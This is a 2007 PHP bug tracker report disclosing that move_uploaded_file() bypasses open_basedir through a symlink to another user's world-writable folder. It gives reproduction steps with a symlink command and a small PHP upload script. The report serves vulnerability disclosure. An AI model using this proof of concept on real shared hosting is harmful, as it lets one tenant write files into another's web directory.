|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2007-03-27 18:40 UTC] tony2001@php.net
[2007-03-27 19:59 UTC] vladimir at petrov dot ks dot ua
[2007-03-27 20:33 UTC] tony2001@php.net
[2007-03-27 21:19 UTC] vladimir at petrov dot ks dot ua
[2007-04-10 22:31 UTC] tony2001@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sat Oct 25 22:00:01 2025 UTC |
Description: ------------ User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory. Reproduce code: --------------- user1 will upload file to user2's /home/user2/public_html folder. We have in /etc/passwd: user1:x:32001:32001::/home/user1:/bin/bash user2:x:32002:32002::/home/user2:/bin/bash Target folder allows to write for anybody: # ls -lA /home/user2 drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/ Apache have mod_php intalled. Apache config for user1: <VirtualHost xxx.xxx.xxx.xxx> ServerName user1.xxxxxxx.com DocumentRoot /home/user1/public_html User user1 php_admin_value open_basedir "/home/user1" </VirtualHost> User user1 can do something like: $ cd /home/user1/public_html/ $ ln -s /home/user2/public_html user2_public_html $ echo '<html><body> <? if ( isset($_FILES["userfile"]) ) { echo "Upload "; if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext")) echo "ok"; else echo "failed"; } ?> <form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> <input type="file" name="userfile"> <input type="submit"> </body></html>' > upload.php Expected result: ---------------- If we access http://user1.xxxxxxx.com/upload.php after file upload expected message "Upload failed" and no file /home/user2/public_html/file.ext in target folder. Actual result: -------------- If we access http://user1.xxxxxxx.com/upload.php after file upload we got message "Upload ok" and file /home/user2/public_html/file.ext well exist in target folder.